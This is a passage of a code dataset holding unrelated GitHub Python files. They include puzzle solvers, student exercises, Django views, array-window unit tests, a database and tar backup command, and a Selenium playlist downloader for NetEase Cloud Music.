= mulheres20 +1\n\n\n\nmedia = somaidade / 4\nprint('The average age of all the people is: {}'.format(media))\nprint('The oldest man is {} years old and his name is: {}'.format(maioridadehomem, nomevelho))\nprint('{} women in total are under 20 years old'.format(mulheres20))","repo_name":"jeffersonsena7/PYTHON","sub_path":"CursoPython/Exercicio56.py","file_name":"Exercicio56.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"40188408773","text":"#!/usr/bin/env python3\n\n### Advent of Code - 2015 - Day 22\n\nimport sys, requests, re, math, itertools, functools, os, collections\nfrom functools import lru_cache\n\nsys.path.append('../../python/')\nfrom aoc_utils import *\n\n# read input data file as one long string and as an array of lines\ninputfile = 'input' if len(sys.argv) < 2 else sys.argv[1]\nif not os.path.exists(inputfile):\n    print(RED+f\"Input file {inputfile} not found!\"+CLEAR)\n    quit()\nfinput = open(inputfile,'r').read().rstrip()\ninput_lines = [line.strip() for line in finput.split('\\n')]\nprint(DBLUE+f\"Input <{inputfile}>, num lines: {len(input_lines)}\"+CLEAR)\n\nspells = dict()\nspells['Magic Missle'] = { 'cost':53, 'dmg':4, 'hp':0, 'armor':0, 'turns':0, 'mana':0 }\nspells['Drain'] = { 'cost':73, 'dmg':2, 'hp':2, 'armor':0, 'turns':0, 'mana':0 }\nspells['Shield'] = { 'cost':113, 'dmg':0, 'hp':0, 'armor':7, 'turns':6, 'mana':0 }\nspells['Poison'] = { 'cost':173, 'dmg':3, 'hp':0, 'armor':0, 'turns':6, 'mana':0 }\nspells[\"Recharge\"] = { 'cost':229, 'dmg':0, 'hp':0, 'armor':0, 'turns':5, 'mana':101 }\n\ndef take_turn(players_turn, boss_hp, player_hp, player_mana, active_spells, mana_used):\n    if players_turn and p2:\n        player_hp -= 1\n        if player_hp <= 0:\n            return\n\n    player_armor = 0 \n    new_spells = dict()\n    for n,d in active_spells.items():\n        if d['turns'] >= 0: # perform the spell this turn\n            boss_hp -= d['dmg']\n            player_hp += d['hp']\n            player_armor += d['armor']\n            player_mana += d['mana']\n            new_sp = d.copy()\n            new_sp['turns'] -= 1\n            if new_sp['turns'] > 0:\n                new_spells[n] = new_sp\n\n    if boss_hp <= 0: # we win!\n        global least_mana_used\n        least_mana_used = min(mana_used, least_mana_used)\n        return\n\n    if mana_used >= least_mana_used:\n        return\n\n    if players_turn:\n        for n,d in spells.items():\n            if n in new_spells.keys(): # can't cast an already active spell\n                continue\n            if d['cost'] <= player_mana:\n                nsp_copy = new_spells.copy()\n                nsp_copy[n] = d.copy()\n                take_turn(False, boss_hp, player_hp, player_mana-d['cost'], nsp_copy, mana_used+d['cost'])\n    else:\n        player_hp += player_armor-boss_dmg if player_armor-boss_dmg < 0 else -1\n        if player_hp > 0:\n            take_turn(True, boss_hp, player_hp, player_mana, new_spells, mana_used)\n    return\n\n
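# Note: take_turn() is a depth-first search over the spell choices; the\n# mana_used >= least_mana_used check above prunes any branch that can no\n# longer beat the best total found so far (a simple branch-and-bound).\n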
# Setup\nplayer_hp = 50\nplayer_mana = 500\nboss_hp = int(input_lines[0].split()[-1])\nboss_dmg = int(input_lines[1].split()[-1])\n\np2 = False\nleast_mana_used = 9999999\ntake_turn(True, boss_hp, player_hp, player_mana, dict(), 0)\npart1(least_mana_used)\n\np2 = True\nleast_mana_used = 9999999\ntake_turn(True, boss_hp, player_hp, player_mana, dict(), 0)\npart2(least_mana_used)\n","repo_name":"rdefeo/adventofcode","sub_path":"2015/day22/day22.py","file_name":"day22.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"17931773859","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 21 22:53:14 2020\n\n@author: liang\n\"\"\"\n\nS = input()\n\nans = S[0]\n\nfor i in range(8):\n    tmp = int(S[0])\n    lis = list()\n    for j in range(3):\n        lis.append(i>>j&1)\n    for k in range(3):  # use k here so the outer loop variable i is not shadowed\n        if lis[k] == 1:\n            tmp += int(S[k+1])\n        else:\n            tmp -= int(S[k+1])\n    #print(tmp)\n    if tmp == 7:\n        for k in range(3):\n            if lis[k] == 1:\n                ans += \"+\" + S[k+1]\n            else:\n                ans += \"-\" + S[k+1]\n        ans += \"=7\"\n        break\n    #print(lis)\nelse:\n    print(\"err\")\nprint(ans)","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03545/s999645533.py","file_name":"s999645533.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"26062594758","text":"\ndef check_palindrome():\n    \"\"\"\n    Runs through all 6-digit numbers and checks the mentioned conditions.\n    The function prints out the numbers that satisfy this condition.\n\n    Note: It should print out the first number (with a palindrome in its last 4 digits),\n    not all 4 \"versions\" of it.\n    \"\"\"\n\n    for i in range(100000, 1000000):\n        #print(str(i)[2:6])\n        if(check_string_palindrome(str(i)[2:6])==True ): # convert int to string; the last 4 digits form a palindrome\n            #print(str(i)[2:6])\n            temp = i + 1 # first increment of one -> palindrome in the last 5 digits\n            if(check_string_palindrome(str(temp)[1:6])==True):\n                #print(str(i)[1:6])\n                temp = i + 2 # second increment of one -> palindrome in the middle 4 digits\n                if (check_string_palindrome(str(temp)[1:5]) == True):\n                    #print(str(i)[1:5])\n                    temp = i + 3 # third increment of one -> all 6 digits form a palindrome\n                    if (check_string_palindrome(str(temp)[0:6]) == True):\n                        print(i)\n\n\ndef check_string_palindrome(String_Check_poly): # internal helper to check whether a string is a palindrome\n    for i in range(len(String_Check_poly)//2):\n        if String_Check_poly[i] != String_Check_poly[-1-i]:\n            return False\n    #print(String_Check_poly)\n    return True\n\n\n\n\n\ncheck_palindrome()\n\n","repo_name":"nisimperets/assignment-1-complete","sub_path":"ex1 q2.py","file_name":"ex1 q2.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"43582976324","text":"from collections import UserDict\r\n\r\nclass Field:\r\n    # Field: Base class for record fields. It will be the parent of all fields and implements the logic common to all of them.\r\n    def __init__(self, value):\r\n        self.value = value\r\n\r\n    def __str__(self):\r\n        return str(self.value)\r\n\r\n\r\nclass Name(Field):\r\n    # Name: Class for storing a contact's name. A required field.\r\n    ...\r\n\r\n\r\nclass Phone(Field):\r\n    # An optional phone field; a single Record may contain several of these.\r\n    # Phone class:\r\n    # Phone number validation is implemented (the number must be 10 digits).\r\n    # All classes from the assignment are implemented.\r\n
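    # e.g. Phone(\"0501234567\") is accepted, while Phone(\"123\") or\r\n    # Phone(\"050123456a\") raises ValueError.\r\n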
    def __init__(self, value) -> None:\r\n        if len(value) == 10 and value.isdigit():\r\n            self.value = value\r\n        else:\r\n            raise ValueError\r\n\r\n\r\nclass Record:\r\n    # Record: Class for storing information about a contact, including a name and a list of phones.\r\n    # Responsible for the logic of adding/removing/editing the optional fields and for storing the required Name field.\r\n    # Record:\r\n    # Adding phones.\r\n    # Removing phones.\r\n    # Editing phones.\r\n    # Finding a phone.\r\n    # Acceptance criteria\r\n    # Record class:\r\n    # The Name object is stored in a separate attribute.\r\n    # The list of Phone objects is stored in a separate attribute.\r\n    # Methods are implemented for adding - add_phone / removing - remove_phone / editing - edit_phone / finding Phone objects - find_phone.\r\n\r\n    # 1. The find_phone method of Record did not find the contact's first number!\r\n    # 2. The find_phone method of Record did not find the contact's second number!\r\n    # 3. Failed check. If the phone number does not exist, the find_phone method of Record must return None!\r\n    # 4. The edit_phone method of Record did not edit an existing phone number!\r\n    # 5. Failed check. If the phone number does not exist, the edit_phone method of Record must raise a ValueError!\r\n    # 6. Failed check. The remove_phone method of Record does not remove the phone number!\r\n\r\n    def __init__(self, name):\r\n        self.name = Name(name)\r\n        self.phones = []\r\n\r\n    def __str__(self):\r\n        return f\"Contact name: {self.name.value}, phones: {'; '.join(p.value for p in self.phones)}\"\r\n\r\n    def add_phone(self, value: Field):\r\n        self.phones.append(value)\r\n\r\n    def remove_phone(self, number):\r\n        if number in self.phones:\r\n            self.phones.remove(number)\r\n        else:\r\n            raise ValueError\r\n\r\n    def edit_phone(self, old_number, new_number):\r\n        if old_number in self.phones:\r\n            idx = \"\"\r\n            for number in self.phones:\r\n                if number == old_number:\r\n                    idx = self.phones.index(number)\r\n                    self.phones[idx] = new_number\r\n        else:\r\n            raise ValueError\r\n\r\n    def find_phone(self, number):\r\n        if number in self.phones:\r\n            self.value = number\r\n            return self\r\n        else:\r\n            return None\r\n\r\n\r\n
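# e.g. book.find(\"John\") returns the stored Record or None, and\r\n# book.delete(\"John\") removes that entry from book.data.\r\n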
class AddressBook(UserDict):\r\n    contacts = {}\r\n    # AddressBook: Class for storing and managing records.\r\n    # Inherits from UserDict and contains the record-lookup logic for this class.\r\n    # AddressBook:\r\n    # Adding records.\r\n    # Finding records by name.\r\n    # Deleting records by name.\r\n    # AddressBook class:\r\n    # The add_record method adds a record to self.data.\r\n    # The find method finds a record by name.\r\n    # The delete method deletes a record by name.\r\n    # Record entries are stored in AddressBook as dictionary values; the value of Record.name.value is used as the key.\r\n\r\n    # 1. The add_record method of AddressBook did not store the Record!\r\n    # 2. The find method of AddressBook did not return the Record that was stored!\r\n    # 3. Failed check. If the record does not exist, the find method of AddressBook must return None!\r\n    # 2. The delete method of AddressBook did not delete the Record that was stored!\r\n    # 3. Failed check. The delete method of AddressBook did not delete the record!\r\n\r\n    def add_record(self, contact:Record):\r\n        self.data[contact.name.value] = contact\r\n\r\n    def find(self, name):\r\n        if name in self.data:\r\n            return self.data[name]\r\n        else:\r\n            return None\r\n\r\n    def delete(self, contact):\r\n        if contact in self.data:\r\n            return self.data.pop(contact)\r\n        else:\r\n            return None\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    book = AddressBook()\r\n\r\n    # Create a record for John\r\n    john_record = Record(\"John\")\r\n    john_record.add_phone(\"1234567890\")\r\n    john_record.add_phone(\"5555555555\")\r\n\r\n    # # Add John's record to the address book\r\n    book.add_record(john_record)\r\n\r\n    # # Create and add a new record for Jane\r\n    # jane_record = Record(\"Jane\")\r\n    # jane_record.add_phone(\"9876543210\")\r\n    # book.add_record(jane_record)\r\n\r\n    # # Print all records in the book\r\n    # for name, record in book.data.items():\r\n    #     print(record)\r\n\r\n    # Find and edit John's phone\r\n    john = book.find(\"John\")\r\n    john.edit_phone(\"1234567890\", \"1112223333\")\r\n\r\n    print(john)  # Output: Contact name: John, phones: 1112223333; 5555555555\r\n\r\n    # Search for a specific phone in John's record\r\n    found_phone = john.find_phone(\"5555555555\")\r\n    print(f\"{john.name}: {found_phone}\")  # Output: 5555555555\r\n\r\n    # Delete Jane's record\r\n    book.delete(\"Jane\")\r\n","repo_name":"lFlySparkl/hw10","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"74022431018","text":"from django.shortcuts import render\nfrom .forms import contactform\nfrom student.models import Activity\nfrom .models import *\nfrom student.models import *\nfrom .models import Subscribe\nfrom django.contrib import messages\n\n\n# Create your views here.\ndef home(request):\n    course = Course.objects.all()[:6]\n    teacherlen=Teacher.objects.all().count()\n    courselen=Course.objects.all().count()\n    studentlen=User.objects.all().count()-teacherlen\n    return render(request, 'home/index.html', {'course': course,'courselen':courselen,'teacherlen':teacherlen,'studentlen':studentlen})\n\n\ndef aboutus(request):\n    return render(request, 'home/about.html')\n\n\ndef contactus(request):\n    form = contactform()\n    if request.method == 'POST':\n        details = contactform(request.POST)\n        print(details.errors)\n        if details.is_valid():\n            details.save()\n            print('saved')\n\n    return render(request, 'home/contact.html', {'form': form})\n\n\ndef subscribe(request):\n    print(request.method)\n    if request.method == \"POST\":\n        num = request.POST.get('newsletter')\n        if len(num) == 10:\n            res=Subscribe(number=num)\n            res.save()\n            messages.success(request, 'Subscribe successful')\n        else:\n            messages.error(request, 'Please Enter The Valid Number')\n    return render(request, 'home/index.html')\n","repo_name":"kaifkhan1040/DeepPathshala","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"27035129132","text":"import subprocess\nimport os\nimport uuid\nfrom pathlib import Path\nfrom cement import Controller, ex\nfrom mylibrary.ext.base.dump import save_dump, save_ftp\n\n\nclass Backup(Controller):\n    class Meta:\n        label = 'backup'\n        description = 'MyLibrary backup'\n\n    @ex(\n        help='server data backup',\n        arguments=[\n            (['-t', '--type'],\n             dict(\n                 dest='type',\n                 
action='store',\n default='db',\n choices=['db', 'tar'])),\n ],\n )\n def backup(self):\n if self.app.pargs.type is not None:\n if self.app.pargs.type == 'db':\n self._db()\n if self.app.pargs.type == 'tar':\n self._tar()\n\n # noinspection PyBroadException\n @ex(hide=True)\n def _db(self):\n db_user = self.app.config.get('db_conf', 'user')\n db_pass = self.app.config.get('db_conf', 'passwd')\n db_name = self.app.config.get('db_conf', 'name')\n home = self.app.config.get('mylibrary', 'home')\n tmp = '{}/{}.sql'.format(home, uuid.uuid4())\n\n # subprocess for suppress output warning\n subprocess.getoutput('mysqldump -u {} -p{} {} > {}'.format(db_user, db_pass, db_name, tmp))\n try:\n save_dump(self.app, tmp)\n save_ftp(self.app, tmp)\n self.app.log.info('save db dump done')\n except:\n self.app.log.error('An error occurred while saving, check config file.')\n os.remove(tmp)\n\n # noinspection PyBroadException\n @ex(hide=True)\n def _tar(self):\n files = self.app.config.get('dump_tar', 'files')\n dirs = self.app.config.get('dump_tar', 'dirs')\n exclude = self.app.config.get('dump_tar', 'exclude')\n processes = self.app.config.get('dump_tar', 'processes')\n result = {}\n\n for item in files:\n if os.path.isfile(item):\n self.app.log.info('Start compress file: {}'.format(item))\n home = self.app.config.get('mylibrary', 'home')\n tmp = '{}/{}.tar.gz'.format(home, uuid.uuid4())\n subprocess.getoutput(\n 'tar --absolute-names --use-compress-program=\"pigz --best --recursive -p {}\" -cf {} {}'.format(processes,\n tmp,\n item))\n result[item] = tmp\n else:\n self.app.log.error('File not exits: {}'.format(item))\n\n for item in dirs:\n if os.path.isdir(item):\n self.app.log.info('Start compress dir: {}'.format(item))\n home = self.app.config.get('mylibrary', 'home')\n tmp = '{}/{}.tar.gz'.format(home, uuid.uuid4())\n if not exclude:\n subprocess.getoutput(\n 'tar --absolute-names --use-compress-program=\"pigz --best --recursive -p {}\" -cf {} {}'.format(processes,\n tmp,\n item))\n else:\n _exclude = '--exclude={}'.format(' --exclude='.join(exclude))\n subprocess.getoutput(\n 'tar --absolute-names --use-compress-program=\"pigz --best --recursive -p {}\" {} -cf {} {}'.format(processes,\n _exclude,\n tmp,\n item))\n result[item] = tmp\n else:\n self.app.log.error('Dir not exits: {}'.format(item))\n\n for item in result:\n try:\n save_dump(self.app, result[item], item)\n save_ftp(self.app, result[item], item)\n except:\n self.app.log.error('An error occurred while saving, check config file.')\n os.remove(result[item])\n self.app.log.info('save tars dump done')\n","repo_name":"keygenqt/MyLibrary-server","sub_path":"mylibrary/controllers/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"18519248339","text":"n=int(input())\nal=list(map(int,input().split()))\nt=[]\nfor i in range(n):\n t.append(al[i]-(i+1))\nt=sorted(t)\nif n%2==0:\n v=(t[n//2-1]+t[n//2])//2\nelse:\n v=t[n//2]\nans=0\nfor i in t:\n ans+=abs(i-v)\nprint(ans)","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03311/s859792343.py","file_name":"s859792343.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"14065509491","text":"import numpy as np\nimport pytest\n\nfrom improver.utilities.neighbourhood_tools import (\n boxsum,\n pad_and_roll,\n pad_boxsum,\n 
rolling_window,\n)\n\n\n@pytest.fixture\ndef array_size_5():\n return np.arange(25).astype(np.int32).reshape((5, 5))\n\n\n@pytest.fixture\ndef array_size_3():\n return np.arange(9).astype(np.int32).reshape((3, 3))\n\n\ndef test_rolling_window_neighbourhood_size_2(array_size_5):\n \"\"\"Test producing a 2 * 2 neighbourhood.\"\"\"\n windows = rolling_window(array_size_5, (2, 2))\n expected = np.zeros((4, 4, 2, 2), dtype=np.int32)\n for i in range(4):\n for j in range(4):\n expected[i, j] = array_size_5[i : i + 2, j : j + 2]\n np.testing.assert_array_equal(windows, expected)\n\n\ndef test_rolling_window_exception_too_many_dims(array_size_5):\n \"\"\"Test an exception is raised if shape has too many dimensions.\"\"\"\n msg = (\n \"Number of dimensions of the input array must be greater than or \"\n \"equal to the length of the neighbourhood shape used for \"\n \"constructing rolling window neighbourhoods.\"\n )\n with pytest.raises(ValueError) as exc_info:\n rolling_window(array_size_5, (2, 2, 2))\n assert msg in str(exc_info.value)\n\n\ndef test_rolling_window_exception_dims_too_large(array_size_5):\n \"\"\"Test an exception is raised if dimensions of shape are larger than\n corresponding dimensions of input array.\"\"\"\n msg = (\n \"The calculated shape of the output array view contains a \"\n \"dimension that is negative or zero. Each dimension of the \"\n \"neighbourhood shape must be less than or equal to the \"\n \"corresponding dimension of the input array.\"\n )\n with pytest.raises(RuntimeError) as exc_info:\n rolling_window(array_size_5, (2, 6))\n assert msg in str(exc_info.value)\n\n\ndef test_rolling_window_writable(array_size_5):\n \"\"\"Test that result is writable if and only if `writable` is True.\"\"\"\n windows = rolling_window(array_size_5, (2, 2))\n msg = \"assignment destination is read-only\"\n with pytest.raises(ValueError) as exc_info:\n windows[0, 0, 0, 0] = -1\n assert msg in str(exc_info.value)\n windows = rolling_window(array_size_5, (2, 2), writeable=True)\n windows[0, 0, 0, 0] = -1\n assert windows[0, 0, 0, 0] == -1\n\n\ndef test_padding_neighbourhood_size_2(array_size_5):\n \"\"\"Test that result is same as result of rolling_window with a border of zeros.\"\"\"\n padded = pad_and_roll(array_size_5, (2, 2), mode=\"constant\")\n window = rolling_window(array_size_5, (2, 2))\n inner_part = padded[1:-1, 1:-1, ::]\n np.testing.assert_array_equal(inner_part, window)\n border_index = (\n [[0, i, 0, j] for i in range(5) for j in [0, 1]]\n + [[5, i, 1, j] for i in range(5) for j in [0, 1]]\n + [[i, 0, j, 0] for i in range(5) for j in [0, 1]]\n + [[i, 5, j, 1] for i in range(5) for j in [0, 1]]\n )\n outer_part = padded[list(zip(*border_index))]\n np.testing.assert_array_equal(outer_part, np.zeros(40, dtype=np.int32))\n\n\ndef test_padding_non_zero(array_size_5):\n \"\"\"Test padding with a number other than the default of 0.\"\"\"\n padded = pad_and_roll(array_size_5, (2, 2), mode=\"constant\", constant_values=1)\n border_index = (\n [[0, i, 0, j] for i in range(5) for j in [0, 1]]\n + [[5, i, 1, j] for i in range(5) for j in [0, 1]]\n + [[i, 0, j, 0] for i in range(5) for j in [0, 1]]\n + [[i, 5, j, 1] for i in range(5) for j in [0, 1]]\n )\n outer_part = padded[list(zip(*border_index))]\n np.testing.assert_array_equal(outer_part, np.ones(40, dtype=np.int32))\n\n\ndef test_pad_boxsum(array_size_3):\n \"\"\"Test that padded array consists of input array surrounded by border of zeros.\"\"\"\n padded = pad_boxsum(array_size_3, 3, mode=\"constant\")\n expected = 
np.zeros((6, 6), dtype=np.int32)\n expected[2:5, 2:5] = array_size_3\n np.testing.assert_array_equal(padded, expected)\n\n\ndef test_pad_boxsum_non_zero(array_size_3):\n \"\"\"Test padding with a number other than the default of 0.\"\"\"\n padded = pad_boxsum(array_size_3, 3, mode=\"constant\", constant_values=2)\n expected = 2 * np.ones((6, 6), dtype=np.int32)\n expected[2:5, 2:5] = array_size_3\n np.testing.assert_array_equal(padded, expected)\n\n\ndef test_boxsum_with_automatic_cumsum(array_size_5):\n \"\"\"Test that boxsum correctly calculates neighbourhood sums using raw array.\"\"\"\n result = boxsum(array_size_5, 3)\n expected = np.array(\n [\n [np.sum(array_size_5[i - 1 : i + 2, j - 1 : j + 2]) for j in [2, 3]]\n for i in [2, 3]\n ]\n )\n np.testing.assert_array_equal(result, expected)\n\n\ndef test_boxsum_non_square(array_size_5):\n \"\"\"Test that boxsum correctly calculates neighbourhood sums using\n non-square box.\"\"\"\n result = boxsum(array_size_5, (1, 3))\n expected = np.array(\n [[np.sum(array_size_5[i, j - 1 : j + 2]) for j in [2, 3]] for i in range(1, 5)]\n )\n np.testing.assert_array_equal(result, expected)\n\n\ndef test_boxsum_with_precalculated_cumsum(array_size_5):\n \"\"\"Test that boxsum correctly calculates neighbourhood sums using\n pre-calculated cumsum.\"\"\"\n cumsum_arr = np.array(\n [[np.sum(array_size_5[: i + 1, : j + 1]) for j in range(5)] for i in range(5)]\n )\n result = boxsum(cumsum_arr, 3, cumsum=False)\n expected = np.array(\n [\n [np.sum(array_size_5[i - 1 : i + 2, j - 1 : j + 2]) for j in [2, 3]]\n for i in [2, 3]\n ]\n )\n np.testing.assert_array_equal(result, expected)\n\n\ndef test_boxsum_with_padding(array_size_5):\n \"\"\"Test that boxsum correctly calculates neighbourhood sums when adding padding to array.\"\"\"\n result = boxsum(array_size_5, 3, mode=\"constant\", constant_values=0)\n expected = np.array(\n [\n [\n np.sum(array_size_5[max(0, i - 1) : i + 2, max(0, j - 1) : j + 2])\n for j in range(5)\n ]\n for i in range(5)\n ]\n )\n np.testing.assert_array_equal(result, expected)\n\n\ndef test_boxsum_exception_non_integer(array_size_5):\n \"\"\"Test that an exception is raised if `boxsize` is not an integer.\"\"\"\n msg = \"The size of the neighbourhood must be of an integer type.\"\n with pytest.raises(ValueError) as exc_info:\n boxsum(array_size_5, 1.5)\n assert msg in str(exc_info.value)\n\n\ndef test_boxsum_exception_not_odd(array_size_5):\n \"\"\"Test that an exception is raised if `boxsize` contains a number that is not odd.\"\"\"\n msg = \"The size of the neighbourhood must be an odd number.\"\n with pytest.raises(ValueError) as exc_info:\n boxsum(array_size_5, (1, 2))\n assert msg in str(exc_info.value)\n","repo_name":"metoppv/improver","sub_path":"improver_tests/utilities/test_neighbourhood_tools.py","file_name":"test_neighbourhood_tools.py","file_ext":"py","file_size_in_byte":6673,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"90"} +{"seq_id":"42278759420","text":"\n''' Problem Statement : To get the Nth node in a linked list\nAlgorithm: 1. Initialize count = 0\n 2. Loop through the link list\n a. if count is equal to the passed index then return current node\n b. Increment count\n c. 
change current to point to next of the current.\nReferences : https://www.geeksforgeeks.org/write-a-function-to-get-nth-node-in-a-linked-list/'''\n\n\n# Returns data at given index in linked list \ndef getDataAtNthIndex(self, index): \n    current = self.head # Initialise temp \n    count = 0 # Index of current node \n\n    # Loop while end of linked list is not reached \n    while (current): \n        if (count == index): # If the current index holds the data to be found\n            return current.data \n        count += 1 # Increment the value of count\n        current = current.next # Shift the pointer to the next node\n\n    # if we get to this line, the user was asking \n    # for a non-existent element so we assert fail \n    assert(False) \n    return 0\n","repo_name":"manvi0308/100DaysOfAlgo","sub_path":"Day 16/GetNthNodeInALinkedList.py","file_name":"GetNthNodeInALinkedList.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"90"} +{"seq_id":"17350287162","text":"# *args behaves like a list, whereas **kwargs (keyword arguments) behaves like a dictionary; *args is somewhat similar to varargs in Java, e.g. sum(String...s), i.e. passing one or more values\n# for args there is a single star, whereas kwargs takes two stars\n# we can also write methods that accept both args and kwargs, e.g. myblog_posts(*args,**kwargs)\nblog_1 = 'I am so awesome'\nblog_2 = 'Cars are cool.'\nblog_3 = 'Aww look at my cat.'\n\n\n'''\ndef blog_posts(*args):\n    for post in args:\n        print(post)\n    \n#blog_posts(blog_1) \nblog_posts(blog_1,blog_2,blog_3)\n'''\n\n'''\ndef blog_posts(title,*args):\n    print(title)\n    for post in args:\n        print(post)\nsite_title='My Blogs' \n#blog_posts(site_title) # here i didnt pass any arguments except title\n#blog_posts(site_title,blog_1)\nblog_posts(site_title,blog_1,blog_2,blog_3)\n'''\n\nsite_title='My Blogs' \ndef blog_posts_kw(title,**kwargs):\n    print(title)\n    for p_title,post in kwargs.items():\n        print(p_title,post)\n    \n#blog_posts_kw(site_title) # no arguments\n\nblog_posts_kw(site_title,blog_1 = 'I am so awesome',\n              blog_2 = 'Cars are cool.',\n              blog_3 = 'Aww look at my cat.')\ndef blog_posts_args_kwargs(title,*args,**kwargs):\n    print(title)\n    for arg in args:\n        print(arg)\n    for p_title,post in kwargs.items():\n        print(p_title,post)\n\nprint(\"below is args and kwargs calling \")\n
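# note: in both the definition and the call, the positional *args values must\n# come before the keyword **kwargs values, otherwise Python raises an error\n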
blog_posts_args_kwargs(site_title,'1','2','3',blog_1 = 'I am so awesome',\n                       blog_2 = 'Cars are cool.',\n                       blog_3 = 'Aww look at my cat.')\n \n \n","repo_name":"yadagiricse1/PracticePythonCode","sub_path":"IntermediatePython/Args_and_Kwargs.py","file_name":"Args_and_Kwargs.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"6898432115","text":"from selenium import webdriver\r\nfrom tqdm import tqdm\r\nimport time,re,requests,os\r\n\r\nheaders = {\r\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36'\r\n}\r\n\r\n# Create the folder for the playlist\r\ndef create_file(user):\r\n    if not os.path.exists(user):\r\n        os.mkdir(user)\r\n\r\n# Fetch and save the playlists the user created\r\ndef get_play_list(user,user_url):\r\n    driver = webdriver.Chrome()\r\n    driver.get(user_url)\r\n    driver.switch_to.frame(\"g_iframe\")\r\n    menu = driver.find_element_by_class_name('m-cvrlst').find_elements_by_tag_name('li')\r\n    for i in range(len(menu)):\r\n        hf = menu[i].find_element_by_class_name('msk').get_attribute('href')\r\n        name = menu[i].find_element_by_class_name('tit').get_attribute('title')\r\n        with open(user+'/'+user+'.txt','a',encoding='utf-8') as f:\r\n            f.write(name+' '+hf+'\\n')\r\n        print(name,hf)\r\n    driver.close()\r\n    song_list = input('Enter the link of the playlist to download: ')\r\n    main(song_list)\r\n\r\ndef main(song_list):\r\n    # log-in steps\r\n    driver = webdriver.Chrome()\r\n    driver.get(song_list)\r\n    driver.maximize_window()\r\n    time.sleep(3)\r\n\r\n    driver.find_element_by_xpath('/html/body/div[1]/div[1]/div/div[1]/a').click()\r\n    time.sleep(1)\r\n    driver.find_element_by_xpath('/html/body/div[6]/div[2]/div/div[2]/div/div[3]/a').click()\r\n    driver.find_element_by_xpath('//*[@id=\"j-official-terms\"]').click()\r\n    driver.find_element_by_xpath('/html/body/div[6]/div[2]/div/div[1]/div[1]/div[2]/ul/li[1]/a').click()\r\n    time.sleep(7)\r\n\r\n    driver.minimize_window()\r\n    # get the songs in the playlist\r\n    driver.switch_to.frame(\"g_iframe\")\r\n    info=driver.find_element_by_xpath('//table[@class=\"m-table \"]/tbody').find_elements_by_tag_name(\"tr\")\r\n\r\n    # get each song's link and name\r\n    for i in tqdm(range(len(info))):\r\n        hf=info[i].find_element_by_tag_name(\"a\").get_attribute('href')\r\n        name = info[i].find_element_by_tag_name(\"b\").get_attribute('title')\r\n        res = re.findall('(?<=id=).*$', hf)\r\n        # download the song\r\n        if not os.path.exists('歌曲'):\r\n            os.mkdir('歌曲')\r\n        download_song_url = 'http://music.163.com/song/media/outer/url?id=' + res[0] + '.mp3'\r\n        ans = requests.get(download_song_url,headers=headers)\r\n        print('Downloading:',name)\r\n        if any(c in name for c in ':*?<>|/\"\\\\'):  # replace characters that are illegal in file names\r\n            name = name.replace(\":\",'_').replace('*','_').replace(\"?\",'_').replace('<','_').replace('>','_').replace('|','_').replace('/','_').replace('\"','_').replace('\\\\','_')\r\n        with open('歌曲/'+name+'.mp3','ab') as f:\r\n            f.write(ans.content)\r\n    driver.quit()\r\n    print('Download finished!')\r\n\r\nif __name__ == '__main__':\r\n    home_url = 'https://music.163.com/#/user/home?id='\r\n    user = input('Enter the user nickname: ')\r\n    id = input('Enter the user ID: ')\r\n    user_url = home_url + id\r\n    create_file(user)\r\n    get_play_list(user,user_url)","repo_name":"perhapszeyi/download_cloud_song","sub_path":"download_netease_cloud_song.py","file_name":"download_netease_cloud_song.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"73221447335","text":"# https://leetcode.com/problems/inorder-successor-in-bst/\nclass Solution:\n    def __init__(self):\n        self.res = []\n\n    def inorder(self, root):\n        if root:\n            self.inorder(root.left)\n            self.res.append(int(root.val))\n            self.inorder(root.right)\n\n    def inorderSuccessor(self, root: 'TreeNode', p: 'TreeNode') -> 'TreeNode':\n        self.inorder(root)\n        value = p.val\n        if value in self.res:\n            ind = self.res.index(value)\n            if ind + 1 >= len(self.res):\n                return None\n            else:\n                return TreeNode(self.res[ind + 1])\n        else:\n            return None","repo_name":"client69/Open","sub_path":"Inorder_Successor_BinaryTree.py","file_name":"Inorder_Successor_BinaryTree.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"90"} +{"seq_id":"13130298709","text":"# Ahmed Rahman PSID:1820239\nlistMaker = input()\nlistToFilter = listMaker.split()\nyikersList=[]\nfor i in listToFilter:\n    if int(i)>= 0:\n        